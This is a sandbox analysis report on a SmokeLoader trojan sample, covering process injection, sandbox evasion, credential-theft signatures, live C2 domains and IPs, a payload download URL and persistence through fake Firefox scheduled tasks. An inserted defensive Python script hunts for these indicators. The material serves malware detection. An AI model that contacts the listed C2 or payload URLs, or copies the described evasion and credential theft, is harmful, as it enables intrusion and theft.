    O4zPA1oI9Y.exe (node 10). Signatures: Detected unpacking (changes PE section rights); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces. Injected: explorer.exe (node 19).
    jvgasii (node 13). Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file.
    uegasii (node 15). Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection).
    explorer.exe (node 19, injected; badge counts 69 and 9). DNS/IP: 23.145.40.164, 443, 61410, SURFAIRWIRELESS-IN-01US Reserved; ninjahallnews.com 23.145.40.168, 443, 61433, 61434, SURFAIRWIRELESS-IN-01US Reserved; 2 other IPs or domains. Dropped: C:\Users\user\AppData\Roaming\uegasii (PE32); C:\Users\user\AppData\Roaming\jvgasii (PE32); C:\Users\user\AppData\Local\Temp\DE97.exe (PE32); 2 other malicious files. Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Injects code into the Windows Explorer (explorer.exe); 3 other signatures. Started: 8CAE.exe (node 24), DE97.exe (node 27), explorer.exe (node 29), 5 other processes (node 31).
    8CAE.exe (node 24; badge count 2). Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; 2 other signatures. Started: cmd.exe (node 33).
    DE97.exe (node 27). Signatures: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); 4 other signatures.
    explorer.exe (node 29; badge count 20). Signatures: System process connects to network (likely due to code injection or exploit); Found evasive API chain (may stop execution after checking mutex); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access).
    5 other processes (node 31). Signatures: Tries to harvest and steal browser information (history, passwords, etc).
    cmd.exe (node 33). Signatures: Uses netsh to modify the Windows network and firewall settings; Uses ipconfig to lookup or modify the Windows network settings; Modifies the windows firewall. Started: WMIC.exe (node 36), systeminfo.exe (node 39), conhost.exe (node 41), 17 other processes (node 43).
    WMIC.exe (node 36). Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes).

    Source | Detection | Scanner | Label | Link
    O4zPA1oI9Y.exe | 79% | ReversingLabs | Win32.Trojan.SmokeLoader |
    O4zPA1oI9Y.exe | 100% | Avira | HEUR/AGEN.1312571 |
    O4zPA1oI9Y.exe | 100% | Joe Sandbox ML | |
    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Roaming\jvgasii | 100% | Avira | HEUR/AGEN.1312571 |
    C:\Users\user\AppData\Local\Temp\8CAE.exe | 100% | Joe Sandbox ML | |
    C:\Users\user\AppData\Roaming\jvgasii | 100% | Joe Sandbox ML | |
    C:\Users\user\AppData\Roaming\uegasii | 100% | Joe Sandbox ML | |
    C:\Users\user\AppData\Local\Temp\DE97.exe | 100% | Joe Sandbox ML | |
    C:\Users\user\AppData\Local\Temp\8CAE.exe | 42% | ReversingLabs | Win64.Trojan.Generic |
    C:\Users\user\AppData\Roaming\jvgasii | 79% | ReversingLabs | Win32.Trojan.SmokeLoader |
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://api.msn.com/v1/news/Feed/Windows? | 0% | URL Reputation | safe |
    https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
    https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe |
    https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe |
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
    http://schemas.micro | 0% | URL Reputation | safe |
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe |
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
    https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
    https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
    https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
    https://api.msn.com/ | 0% | URL Reputation | safe |
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | URL Reputation | safe |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
    ninjahallnews.com | 23.145.40.168 | true | true | | unknown
    nwgrus.ru | 160.177.223.165 | true | true | | unknown
    18.31.95.13.in-addr.arpa | unknown | unknown | true | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    https://23.145.40.164/ksa9104.exe | true | | unknown
    https://ninjahallnews.com/search.php | true | | unknown
    https://fallhandbat.com/search.php | true | | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://api.msn.com/v1/news/Feed/Windows? | explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://duckduckgo.com/chrome_newtab | explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr | false | URL Reputation: safe | unknown
    https://duckduckgo.com/ac/?q= | explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr | false | URL Reputation: safe | unknown
    https://api.msn.com/I | explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://ninjahallnews.com/search.phpMozilla/5.0 | explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3175208514.0000000000E79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4580797896.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4580427782.0000000000949000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4580422286.0000000002A68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4580424413.0000000000BD9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://word.office.comM | explorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr | false | URL Reputation: safe | unknown
    https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar- | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    http://schemas.micro | explorer.exe, 00000002.00000000.2218524683.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2216870595.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2218534895.0000000007B60000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr | false | URL Reputation: safe | unknown
    https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://wns.windows.com/e | explorer.exe, 00000002.00000000.2219776484.00000000099AB000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000000.2222332214.000000000C36B000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr | false | | unknown
    https://ninjahallnews.com/ | explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3226508578.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
    https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0 | explorer.exe, 0000000D.00000002.3226508578.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://excel.office.com- | explorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr | false | URL Reputation: safe | unknown
    https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of- | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://www.ecosia.org/newtab/ | explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr | false | URL Reputation: safe | unknown
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://ninjahallnews.com/search.phpo | explorer.exe, 0000000D.00000002.3226508578.0000000002A60000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://ac.ecosia.org/autocomplete?q= | explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.dr | false | URL Reputation: safe | unknown
    https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
    https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve | explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | false | |
                                                                unknown
                                                                https://powerpoint.office.comEMdexplorer.exe, 00000002.00000000.2222332214.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://ninjahallnews.com/earch.php;Lexplorer.exe, 0000000D.00000002.3226508578.0000000002A60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2222332214.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://outlook.comeexplorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.2219776484.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://api.msn.com/explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://www.msn.com:443/en-us/feedexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://ninjahallnews.com//explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
23.145.40.168 | ninjahallnews.com | Reserved | 22631 | SURFAIRWIRELESS-IN-01 (US) | true
190.249.249.14 | unknown | Colombia | 13489 | EPMTelecomunicacionesSAESP (CO) | true
23.145.40.164 | unknown | Reserved | 22631 | SURFAIRWIRELESS-IN-01 (US) | true
160.177.223.165 | nwgrus.ru | Morocco | 36903 | MT-MPLS (MA) | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529186
Start date and time: 2024-10-08 18:22:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: O4zPA1oI9Y.exe (renamed because the original name is a hash value)
Original Sample Name: 2942cb9fca04e939af4ed1eef717e123.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@61/15@9/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 166
• Number of non-executed functions: 92
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.113.103.199, 4.245.163.56, 172.202.163.200, 20.12.23.50, 40.115.3.253
• Excluded domains from analysis (whitelisted): client.wns.windows.com, wns.notify.trafficmanager.net, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: O4zPA1oI9Y.exe
Timeline

Time | Type | Description
12:23:13 | API Interceptor | 331614x Sleep call for process: explorer.exe modified
12:24:56 | API Interceptor | 14x Sleep call for process: WMIC.exe modified
18:23:24 | Task Scheduler | Run new task: Firefox Default Browser Agent 2F0F3A93C35A146B path: C:\Users\user\AppData\Roaming\jvgasii
18:24:18 | Task Scheduler | Run new task: Firefox Default Browser Agent 55CFE31E989DA996 path: C:\Users\user\AppData\Roaming\uegasii
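The two Task Scheduler entries above show the loader's persistence: it registers tasks whose names copy Firefox's genuine "Firefox Default Browser Agent <16 hex digits>" task, but whose action points at a randomly named file under the user's AppData\Roaming directory. Combined with the contacted IPs and domains listed in this report, that gives a compact hunting set. The script below is an added example written for this page, not Joe Sandbox code and not part of the report. It assumes (not stated in the report) that the genuine Firefox task's action lives under the Firefox installation directory in Program Files, so the same task name pointing anywhere else is treated as masquerading. The telemetry lines it scans are constructed for the demonstration; only the IP, domain and task values come from the report.

```python
"""Hunt for the SmokeLoader indicators from this report in endpoint telemetry.

Added example, not Joe Sandbox code. IOC values come from the report's
contacted-IP table and Task Scheduler timeline; the log lines are constructed.
"""
import re
from dataclasses import dataclass
from typing import List

# Contacted IPs and resolved domains flagged malicious in the report.
C2_IPS = {"23.145.40.168", "23.145.40.164", "190.249.249.14", "160.177.223.165"}
C2_DOMAINS = {"ninjahallnews.com", "nwgrus.ru"}

# The loader's tasks copy the name format of Firefox's own maintenance task.
# Assumption (not from the report): the genuine task's action is a binary under
# the Firefox install directory, so the same name with any other action path
# is a masquerade. Path comparison is case-insensitive.
TASK_NAME_RE = re.compile(r"^Firefox Default Browser Agent [0-9A-Fa-f]{16}$")
LEGIT_TASK_DIRS = (
    "c:\\program files\\mozilla firefox\\",
    "c:\\program files (x86)\\mozilla firefox\\",
)

# Constructed telemetry, tab-separated: timestamp, event type, fields.
#   DNS  <query name> <resolved address>
#   TASK <task name> <action path>
#   CONN <destination ip> <destination port>
# The legitimate-looking TASK row stands in for a real Firefox install.
SAMPLE_LOG = """\
2024-10-08 18:23:10\tDNS\tninjahallnews.com\t23.145.40.168
2024-10-08 18:23:12\tDNS\tassets.msn.com\t204.79.197.203
2024-10-08 18:23:24\tTASK\tFirefox Default Browser Agent 2F0F3A93C35A146B\tC:\\Users\\user\\AppData\\Roaming\\jvgasii
2024-10-08 18:23:40\tTASK\tFirefox Default Browser Agent 308046B0AF4A39CB\tC:\\Program Files\\Mozilla Firefox\\default-browser-agent.exe
2024-10-08 18:24:05\tDNS\tnwgrus.ru\t160.177.223.165
2024-10-08 18:24:18\tTASK\tFirefox Default Browser Agent 55CFE31E989DA996\tC:\\Users\\user\\AppData\\Roaming\\uegasii
2024-10-08 18:24:40\tCONN\t190.249.249.14\t80
2024-10-08 18:24:50\tDNS\twww.ecosia.org\t104.18.28.1
"""


@dataclass(frozen=True)
class Hit:
    timestamp: str
    reason: str
    evidence: str


def domain_matches(host: str) -> bool:
    """True for a C2 domain or any subdomain of one (not for look-alike suffixes)."""
    h = host.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in C2_DOMAINS)


def task_is_masquerade(name: str, action: str) -> bool:
    """Firefox task name whose action is outside the Firefox install directory."""
    if not TASK_NAME_RE.match(name):
        return False
    return not action.lower().startswith(LEGIT_TASK_DIRS)


def hunt(log: str) -> List[Hit]:
    """Scan tab-separated telemetry and return one Hit per matching event."""
    hits: List[Hit] = []
    for raw in log.splitlines():
        parts = raw.split("\t")
        if len(parts) < 4:
            continue  # malformed or unrelated row
        ts, kind, a, b = parts[0], parts[1], parts[2], parts[3]
        if kind == "DNS":
            if domain_matches(a):
                hits.append(Hit(ts, "dns-c2-domain", a))
            elif b in C2_IPS:
                hits.append(Hit(ts, "dns-c2-ip", b))
        elif kind == "CONN":
            if a in C2_IPS:
                hits.append(Hit(ts, "conn-c2-ip", f"{a}:{b}"))
        elif kind == "TASK":
            if task_is_masquerade(a, b):
                hits.append(Hit(ts, "task-masquerade", f"{a} -> {b}"))
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(f"{hit.timestamp}  {hit.reason:16} {hit.evidence}")
```

The task check deliberately keys on the action path rather than the task name: the name is chosen by the loader precisely to blend in with the real Firefox task, so a name-only rule would either miss it or alert on every Firefox install.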
Matching IPs in other Joe Sandbox analyses

Match | Associated Sample Name / URL | Detection | Threat Name
23.145.40.168 | 5zA3mXMdtG.exe | malicious | SmokeLoader
23.145.40.168 | Lk9rbSoFqa.exe | malicious | SmokeLoader
23.145.40.168 | ctMI3TYXpX.exe | malicious | SmokeLoader
23.145.40.168 | bCnarg2O62.exe | malicious | SmokeLoader
23.145.40.164 | 5zA3mXMdtG.exe | malicious | SmokeLoader
23.145.40.164 | Lk9rbSoFqa.exe | malicious | SmokeLoader
23.145.40.164 | ctMI3TYXpX.exe | malicious | SmokeLoader
23.145.40.164 | bCnarg2O62.exe | malicious | SmokeLoader
23.145.40.164 | BzLGqYKy7o.exe | malicious | SmokeLoader
23.145.40.164 | UV2uLdRZix.exe | malicious | SmokeLoader
23.145.40.164 | LKpIHL2abO.exe | malicious | SmokeLoader
23.145.40.164 | wu5C20dPdy.exe | malicious | SmokeLoader
23.145.40.164 | HaPJ2rPP6w.exe | malicious | SmokeLoader
23.145.40.164 | c7v62g0YpB.exe | malicious | SmokeLoader
Matching domains in other Joe Sandbox analyses

Match | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
nwgrus.ru | 5zA3mXMdtG.exe | malicious | SmokeLoader | 181.52.122.51
nwgrus.ru | Lk9rbSoFqa.exe | malicious | SmokeLoader | 63.143.98.185
nwgrus.ru | ctMI3TYXpX.exe | malicious | SmokeLoader | 180.75.11.133
nwgrus.ru | bCnarg2O62.exe | malicious | SmokeLoader | 109.175.29.39
nwgrus.ru | BzLGqYKy7o.exe | malicious | SmokeLoader | 105.197.97.247
nwgrus.ru | UV2uLdRZix.exe | malicious | SmokeLoader | 185.12.79.25
nwgrus.ru | LKpIHL2abO.exe | malicious | SmokeLoader | 197.164.156.210
nwgrus.ru | wu5C20dPdy.exe | malicious | SmokeLoader | 190.147.128.172
nwgrus.ru | HaPJ2rPP6w.exe | malicious | SmokeLoader | 177.129.90.106
nwgrus.ru | c7v62g0YpB.exe | malicious | SmokeLoader | 190.147.2.86
ninjahallnews.com | 5zA3mXMdtG.exe | malicious | SmokeLoader | 23.145.40.168
ninjahallnews.com | Lk9rbSoFqa.exe | malicious | SmokeLoader | 23.145.40.168
ninjahallnews.com | ctMI3TYXpX.exe | malicious | SmokeLoader | 23.145.40.168
ninjahallnews.com | bCnarg2O62.exe | malicious | SmokeLoader | 23.145.40.168
bg.microsoft.map.fastly.net | Y1ZqkGzvKm.exe | malicious | Snake Keylogger, VIP Keylogger | 199.232.210.172
bg.microsoft.map.fastly.net | Y1ZqkGzvKm.exe | malicious | VIP Keylogger | 199.232.210.172
bg.microsoft.map.fastly.net | https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAg | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://simpleinvoices.io/invoices/gvexd57Lej7 | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://js.schema-forms.org | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg3DC2QYjSoauaoyveU6MGzQ5VY-2FjA-2F-2FRincDy1KlklBXiPJP_QABV8lal1FXq8md0G3-2FIRFNEx2OV-2FLWSv5ByAZvXcaLdzn8wfCvTlDds0ovRZhRFzHNfaxKr2UfovDpEFdLigcTlhUu24CyUOQvOCn6w-2BHb3x6-2BV4Gc9geo2lLTncL6JUMk6T71-2BqjLFsmgG-2BXpvetiYOby06i5CliURFDYqQTT1C2IqhXHNpvN85ZEXfc5YBJaPCdYG7GCx3syxYrFYTqrHhY55-2BpbwTxDCwDN1-2BlowHglPUt5r1G9-2FvJEFg-2F5ssADCqEBOqtEhmmm5GgEypOrZiDwmybFJCcbqY1CFgUEEhAhZH7kmvwleWNlpfoBd | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://customer.thewayofmoney.us | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 5zA3mXMdtG.exe | malicious | SmokeLoader | 199.232.210.172
bg.microsoft.map.fastly.net | Salary Increase Letter_Oct 2024.vbs | malicious | Remcos, GuLoader | 199.232.214.172
bg.microsoft.map.fastly.net | Lk9rbSoFqa.exe | malicious | SmokeLoader | 199.232.210.172
Matching ASNs in other Joe Sandbox analyses

Match | Associated Sample Name / URL | Detection | Threat Name | Context (contacted IP)
SURFAIRWIRELESS-IN-01 (US) | 5zA3mXMdtG.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | Lk9rbSoFqa.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | ctMI3TYXpX.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | bCnarg2O62.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | BzLGqYKy7o.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | UV2uLdRZix.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | LKpIHL2abO.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | wu5C20dPdy.exe | malicious | SmokeLoader | 23.145.40.164
